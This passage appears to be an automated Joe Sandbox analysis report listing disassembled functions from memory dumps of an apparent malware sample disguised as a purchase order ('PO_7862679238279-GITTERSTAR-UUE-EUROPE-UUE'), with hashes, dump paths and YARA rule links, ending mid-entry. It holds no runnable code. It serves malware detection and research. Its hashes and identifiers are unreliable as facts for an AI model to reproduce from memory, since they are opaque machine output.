Opcode ID: 67708e43698f477b9926bdf413673d0e3687588acb05a3f22f8541bbd7c9a319
Instruction ID: 03850533f5e5553d6fc9ade698861d00f32e705bb2dbb6ae0d7e0760804f048b
Opcode Fuzzy Hash: 67708e43698f477b9926bdf413673d0e3687588acb05a3f22f8541bbd7c9a319
Instruction Fuzzy Hash: 70114C30B002149FC744DBA9D595BADBBF2AF88704F28445AE405EB3A2CA719C01CB50

Function 0584611F Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

N, xrefs: 0584612B

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 5f7a4882ada838fa41b72f55416977a693f7a00eb83617b6698a9fc5e2eacfed
Instruction ID: 72b725dd7f84b6a4d751941e0f155d380db8585291a2621fee27ce7f858796d9
Opcode Fuzzy Hash: 5f7a4882ada838fa41b72f55416977a693f7a00eb83617b6698a9fc5e2eacfed
Instruction Fuzzy Hash: 1C11C274A01228CFCB65DF24D995B99BBB5EF49305F4054EAE50EAB261EB306F80CF40

Function 05B0AC26 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

,, xrefs: 05B0AC81

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 7e6e3054cc6e8c6d3ae8958f110644d29d4575db767542cee3d0ef36c323d763
Instruction ID: da4bf0e490a61a32473ec921842641c8fcc5ef7955453f93c83070248a1d0052
Opcode Fuzzy Hash: 7e6e3054cc6e8c6d3ae8958f110644d29d4575db767542cee3d0ef36c323d763
Instruction Fuzzy Hash: 55119D74E01229CFDB20DF64CD58BEDBBB1BB49304F0490DAE949A7280D7356A82DF00

Function 05B0B7B0 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

A, xrefs: 05B0B0AB

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: b74aa144af867b915ff86eb6dcd94fdba3eecf8aa420998c15dfb744f61b4b83
Instruction ID: 9fbdfe97f2c583a2331e31f500ef0e1796a8cc4e8ab77e11b5f3431ceda94513
Opcode Fuzzy Hash: b74aa144af867b915ff86eb6dcd94fdba3eecf8aa420998c15dfb744f61b4b83
Instruction Fuzzy Hash: F611DD70A9022ACFDB20DF14C844FECBBB1BB08300F1050EAE51AA3680E771AE84DF40

Function 05B0AF58 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

A, xrefs: 05B0B0AB

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: a121ff92a02b8a6110e32ed37e3dcef62d4767f8a4e4a7bbf56023df95c336af
Instruction ID: a87d684d59d5f267030f62ccf6f6c87a3454ac7358874cdf2015c0de074f9c8f
Opcode Fuzzy Hash: a121ff92a02b8a6110e32ed37e3dcef62d4767f8a4e4a7bbf56023df95c336af
Instruction Fuzzy Hash: D501D070E9122ACFDB25DF64DC44BADBBB1BB48300F1050E9E519A7280EB742E80DF14

Function 05B0A948 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

9, xrefs: 05B0A997

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: c33d921cffaf7df467cc80a9f153f3943e8d3e22ba2293b2a0ad7e9d03891515
Instruction ID: 542ac185befd71d950a6e109fa1acfbf4f2ece2c1cad5e2337c54db19a215982
Opcode Fuzzy Hash: c33d921cffaf7df467cc80a9f153f3943e8d3e22ba2293b2a0ad7e9d03891515
Instruction Fuzzy Hash: 23F0173190061BDBCF219F54CC00AA9B771FF45300F1096A5E41A23150DB31AB95DF80

Function 0584AD60 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

Teq, xrefs: 0584AD8F

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 88e04956bff79c5e402cd157118178ca6b0bfc8e63c26b028cce990cbb66ea48
Instruction ID: 014a9022b7c7be94f5d3514feafaf9e43c52c77322286b6ed28e5ae525e83b5e
Opcode Fuzzy Hash: 88e04956bff79c5e402cd157118178ca6b0bfc8e63c26b028cce990cbb66ea48
Instruction Fuzzy Hash: 63F09874A112688BCB24DF28D991BDDBBB2FB49304F1095DAE90AB7349DB305E85CF50

Function 05B0AD46 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

., xrefs: 05B0AD8E

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 5ced0dd404cb7a7826291e31a2e2cf81d750cfc48bd291ce48a67d18050e17ba
Instruction ID: 3de4d24f0270fe7546bcd5337603353e9cd29f708d6411c027dc92e1bc60c91d
Opcode Fuzzy Hash: 5ced0dd404cb7a7826291e31a2e2cf81d750cfc48bd291ce48a67d18050e17ba
Instruction Fuzzy Hash: 1CF01574A4122ACFDB60EF08D848BACBBF0FB08300F1484E5D409A3280E734AE84DF50

Function 05848F51 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

l, xrefs: 05848F8B

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: l
API String ID: 0-2517025534
Opcode ID: d37f7a37ef8c74af7b2f3286ab613b3b91a83a296595ed4d5ea725ec9aa6479a
Instruction ID: 42dd46cd7e6b79be6a41cfe165fe3d5a55dd9f3c4b97d40ca2e5d283520f0bd2
Opcode Fuzzy Hash: d37f7a37ef8c74af7b2f3286ab613b3b91a83a296595ed4d5ea725ec9aa6479a
Instruction Fuzzy Hash: 45E0D6B880072ACFEBA0CF28C484AAA77B0EB40300F0082E1880097250DB385D0B8F80

Function 05B0B228 Relevance: 1.3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

4, xrefs: 05B0B25F

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 2e3ece866d181c7c87041c86b9dce5ec62e6e973f3e894f9fdd3e0db88aa2919
Instruction ID: 66f8244f70b8242261d6210587817194c201cef034260d0534ca6c3ee26e9198
Opcode Fuzzy Hash: 2e3ece866d181c7c87041c86b9dce5ec62e6e973f3e894f9fdd3e0db88aa2919
Instruction Fuzzy Hash: 17E09279A4522ACFDB24DF20C944F98BBB1BB49344F0480DAC80DA7291D336AF86DF40

Function 058471C2 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

l, xrefs: 05848F8B

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: l
API String ID: 0-2517025534
Opcode ID: 3486b8969473ea06aedc051726f308f8d3197819f11b3990b5f1a35e74d4b1be
Instruction ID: 42a0fd471f323b5822c603ebd376461447b7594626893e3ccab72fd7c064cf46
Opcode Fuzzy Hash: 3486b8969473ea06aedc051726f308f8d3197819f11b3990b5f1a35e74d4b1be
Instruction Fuzzy Hash: 2FD017B8A10B1ECFDB10DB24D594B6976B2AB44204F009595981A972A5DA301D4E9F81

Function 05B1BDC8 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210b8a03261cd64373deb79df24dac45961c6bf5cf78d352745b6d829c3a3255
Instruction ID: 8390f3116e7c1f08184b09e9ed7982599f4457970ef9bf4813b62770fdf4312d
Opcode Fuzzy Hash: 210b8a03261cd64373deb79df24dac45961c6bf5cf78d352745b6d829c3a3255
Instruction Fuzzy Hash: 8712D834A102148FCB54EF68C894A9DBBB2FF89300F5185A8D94AAB355DF30ED85CF54

Function 0584EEF8 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2310a57bce307698d604539ab38df31e0c275253ae0eec0089dad5f115b8c40c
Instruction ID: cfea67a1c7af4020c8e61b6710243f9f2f135c7376bf031e2e0b8a0fa1cd3e17
Opcode Fuzzy Hash: 2310a57bce307698d604539ab38df31e0c275253ae0eec0089dad5f115b8c40c
Instruction Fuzzy Hash: A6E17A35B012089FDB15DB69D894AAEBBB6BF88310F14806AED06DB390DB35EC45CF54

Function 05B0908D Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4679a336cb9f8c395d53d3b8023f877cd7077eb1769fed79bb38038e79d0970
Instruction ID: f59348902bf4b62d827963c89d7eef24e39c5ee741a87f3ce58b084e6d4d2336
Opcode Fuzzy Hash: d4679a336cb9f8c395d53d3b8023f877cd7077eb1769fed79bb38038e79d0970
Instruction Fuzzy Hash: 38E0922164D1C49FC301CBB4D5612A8BFF0DF4B108B1C40DA88E88B353C5319B13C700

Function 05B1BDB8 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee98de27beccf7499dcda3a0f1beddc092b0ab1240207c6d82d6a5c7cab7f64a
Instruction ID: 5a00a21253be23dc3a1d4f95c984e7ff8e0d714c3aa8c2ab26ab1edcf71e611c
Opcode Fuzzy Hash: ee98de27beccf7499dcda3a0f1beddc092b0ab1240207c6d82d6a5c7cab7f64a
Instruction Fuzzy Hash: 46A1C634B402148FDB54DF64C898B99BBB2BF89300F5485E8E94AAB355DF70AD85CF44

Function 05B1CD70 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c331659597e20d430134e78f4e875f7313bc57f21c55931c5a4b445a3d77aefd
Instruction ID: 1976333df1143a5fc09ae3904d5657f2a3afa1a7792614c649cc5d76ec36eec0
Opcode Fuzzy Hash: c331659597e20d430134e78f4e875f7313bc57f21c55931c5a4b445a3d77aefd
Instruction Fuzzy Hash: F7815C357506148FCB44DF68D498A6DBBB6FF89710F5040A9E906DB3A1CB30EC05CB94

Function 05B1C697 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da8ee8eb778be573035f737a48038c27fa77f434fe2b2d1313db5bdf54d7ecc
Instruction ID: 26dfc082656c61acf2f471f12809253cccd3e90359fc85d28b6ec8333d89c65d
Opcode Fuzzy Hash: 3da8ee8eb778be573035f737a48038c27fa77f434fe2b2d1313db5bdf54d7ecc
Instruction Fuzzy Hash: 92A1AC34A11208DFCB44EFA4E4989AD7BB6FF89311F508565F902AB364DF30AD46CB94

Function 05B147F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f8b72bb627fe3811cd8172effb1c078004006e474744c9f599b97fe6f06b18
Instruction ID: f8832ace0125433f394c9a20e1ae76952ff91abf1aaf6107c9ea80485978e022
Opcode Fuzzy Hash: 30f8b72bb627fe3811cd8172effb1c078004006e474744c9f599b97fe6f06b18
Instruction Fuzzy Hash: 5C812935A00618CFCB64DF69C484A9DB7F6FF48310B5685A9E8169B360DB30FD42CB94

Function 05B07600 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5f35c902b65e212f198832ed6c20134c93d1496979c4dcfb48a7329d3e53d3
Instruction ID: ff265ad1d49bed7e169112e261973bd358b66f49e48e8fc1077d0bc11ed7389f
Opcode Fuzzy Hash: 6f5f35c902b65e212f198832ed6c20134c93d1496979c4dcfb48a7329d3e53d3
Instruction Fuzzy Hash: F981DF70D15208CFDB14DFA9D484BADBBF2FF48341F24A0A9D409A72A5DB75698ADF00

Function 05B075F0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6abcb5bb0ba914b71195da1c4e7938c2c3b0f19a7519b4d1e55bdf74e11e61
Instruction ID: ad8edc15255b1a112db025d50b30d3ef25fe26a584b3fe36b061222c20c7e06e
Opcode Fuzzy Hash: ca6abcb5bb0ba914b71195da1c4e7938c2c3b0f19a7519b4d1e55bdf74e11e61
Instruction Fuzzy Hash: 2F81E270D15208CFDB14DFA9D444BADBBF2FF48341F24A0A9D409A72A4DB75698ADF00

Function 05843718 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f406efa099f59d16bc1c7beb6574ae68d9dec2789e91f7fa00d7218011b34f85
Instruction ID: 2587869b2f0cceb79240a178a206d240b75755311a5603294ee948c03fadb4e7
Opcode Fuzzy Hash: f406efa099f59d16bc1c7beb6574ae68d9dec2789e91f7fa00d7218011b34f85
Instruction Fuzzy Hash: A371B1B4E0520DDFDB04CFA9D444AAEBBF2BB88305F10846AE815A7290DB74AD85CF51

Function 05B00151 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f052e2817277cb22365e48fa99453188349e358e6848385a10ecc0cc0bae00b
Instruction ID: def606c528185a6ce2bce2e712c283d8599f20f2239798aebd29592beb58753f
Opcode Fuzzy Hash: 7f052e2817277cb22365e48fa99453188349e358e6848385a10ecc0cc0bae00b
Instruction Fuzzy Hash: B971EA74D0525CCFDB14DFA4E558BACBBF2FB49301F5490A9E40AAB295CB346A89CF10

Function 05843728 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbf9092c4d6afb1285edc015bd3fe6f33bd55aaa257fa76624787548458fc02
Instruction ID: 97e960ee2bf7ca1e139c4f2066e529b29fd45c92172b6236e806754aa676b95f
Opcode Fuzzy Hash: dfbf9092c4d6afb1285edc015bd3fe6f33bd55aaa257fa76624787548458fc02
Instruction Fuzzy Hash: 0071B1B4E0520DDFDB04CFA9D544AAEBBF2BF88305F10846AE815A7290DB74AD85CF51

Function 05B0656F Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98fe6aff1b6020e7e1af1ee7e512063c34f95c18a9be526de265e300a4e3ef4d
Instruction ID: a5fa9cec7c94cc305bc89bb739ed191784d1d21795f2eb3ad155c91d060a5cc7
Opcode Fuzzy Hash: 98fe6aff1b6020e7e1af1ee7e512063c34f95c18a9be526de265e300a4e3ef4d
Instruction Fuzzy Hash: 7591CF74A04229CFCB60DF68D994B9DBBB2FB49301F1091EAD449A3394DB346E86DF50

Function 05B1CD60 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfb23533a2c160c9f18e2bde72a813a235bb2ee40309a0f7c67036fcca79c9c
Instruction ID: 5aa6c06c5d744a2d027e8e54ca5967e601b2d11f7b0d2d8e88c53eddbfb9c960
Opcode Fuzzy Hash: dbfb23533a2c160c9f18e2bde72a813a235bb2ee40309a0f7c67036fcca79c9c
Instruction Fuzzy Hash: AE613835B50614DFCB44DF68C898A6DBBB6FF89710F5081A9E9069B3A5CB30EC41CB94

Function 0584324E Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98278ad6db45ecbae88bc7eb044af7175497f704ad62a1005da5dea148eb7fa5
Instruction ID: 0d9947f2b766ed01a0a179d15f18c9e14d530a1e8a411e02f9ee7d860071b489
Opcode Fuzzy Hash: 98278ad6db45ecbae88bc7eb044af7175497f704ad62a1005da5dea148eb7fa5
Instruction Fuzzy Hash: 29510070A0521CCFEB10CFA8D945BADBBF2BB49306F608869D80AE7250DB749D85DF00

Function 05B17AB0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2972ff88a4b1448bb3dae81b69e71984ec8dc6d3d2b04f28400fc5ec12f0ccb1
Instruction ID: 8f2bd27a5a2883e5edcff806a72b23d99574f7462a691ff5e0a9d8c340d492eb
Opcode Fuzzy Hash: 2972ff88a4b1448bb3dae81b69e71984ec8dc6d3d2b04f28400fc5ec12f0ccb1
Instruction Fuzzy Hash: C6515E35B106099FCB04DB64E499AAE7BB6FFC8701F008159F9039B364DF34A946CB95

Function 05B0623C Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9461d428295484995c490dee27c73eb62d1d3509529e45277442ad73850147
Instruction ID: 1be2adf38712e878a61dac6003f16a1da1cae0ba9b78d6ba80c5315034531cdd
Opcode Fuzzy Hash: 1f9461d428295484995c490dee27c73eb62d1d3509529e45277442ad73850147
Instruction Fuzzy Hash: 2571DF78E04229CFCB60DF64D895BADBBB2BB49300F1091E9D449A7394DB346E86DF40

Function 05B061C1 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a1e49ffb1ab2c2be7b995f4b7257c32925abde6d80cd75f4796cb1984cf714
Instruction ID: 4deef9713300e0d4d6305852d163b2893d27d02ad6d67ad71c389e51c21dbaad
Opcode Fuzzy Hash: f5a1e49ffb1ab2c2be7b995f4b7257c32925abde6d80cd75f4796cb1984cf714
Instruction Fuzzy Hash: 0561B078E04229CFCB60DF64D854BADBBB2BB49301F1091EAD449A7394DB346E86DF50

Function 05B0610D Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2ef53df779c929b650421acd5daaaa6927efb6a2c3f8bf24fadb2abd8b3c21
Instruction ID: 3100fb59388d7a83a525ae78a2a820e7b4585eb71dd4c9a1911ec4c8efac90be
Opcode Fuzzy Hash: 7f2ef53df779c929b650421acd5daaaa6927efb6a2c3f8bf24fadb2abd8b3c21
Instruction Fuzzy Hash: 2151D174D04229CFCB60DF68D854BADBBB2FB49300F1091A9E449A3395DB346E86DF50

Function 05B1FC68 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec75247dc43737d57f7d5b356d22e6220dbb242640cdf7ec929c401afbddc31a
Instruction ID: f55f7df8297f0011f51743323924ca0949d0f931ae148caf969a5cb47ae62b8e
Opcode Fuzzy Hash: ec75247dc43737d57f7d5b356d22e6220dbb242640cdf7ec929c401afbddc31a
Instruction Fuzzy Hash: A641EE31B147108FCBA0CBB8D5542AEB7F6EF84210F44896ED95AC7A80DB34F941CB99

Function 00D20868 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94a1686bdce4322d74082c558ec48cd210b0f48180e2ca08b87ca5fcbf888d0
Instruction ID: 154a7b1eabf67e10c6d0e168d6dc669124c167ffaa3631a52614f929bc9d71c6
Opcode Fuzzy Hash: c94a1686bdce4322d74082c558ec48cd210b0f48180e2ca08b87ca5fcbf888d0
Instruction Fuzzy Hash: D7410730B002248FDB18AB39A41476E7FE2AFC9700F6844ADD506DB3A6DE348C4387E5

Function 05B066C5 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f8f48f54f27e3808dcef88e0f751ffe83293620b22b2d78a7ed564b790562d
Instruction ID: f435b701ac8d8cfd98b37d6d47ba30b7b2574b124df628a263adb8ec4fdb5142
Opcode Fuzzy Hash: 33f8f48f54f27e3808dcef88e0f751ffe83293620b22b2d78a7ed564b790562d
Instruction Fuzzy Hash: 3C51D078D04219CFCB60DF68D854BEDBBB2FB09300F1091A9E459A7395DB346A86DF50

Function 05B0C988 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9f7556f1b7147bf095f3b5d3d0653870738605c1cedc3da0181f0155fbf809
Instruction ID: 8eb9b340127b64f7f8fb45190e45180b89f9b121e6fa7683a79de4ce43ca07b8
Opcode Fuzzy Hash: 2b9f7556f1b7147bf095f3b5d3d0653870738605c1cedc3da0181f0155fbf809
Instruction Fuzzy Hash: ED512370D00218DFDB14CF99D944BADFBF2BB89300F1091AAE409AB294DB75694ACF50

Function 05B0A2AC Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb261f2bcf48edc67715285733ff1c1e09f368907e38ec296b922bce44d09ad
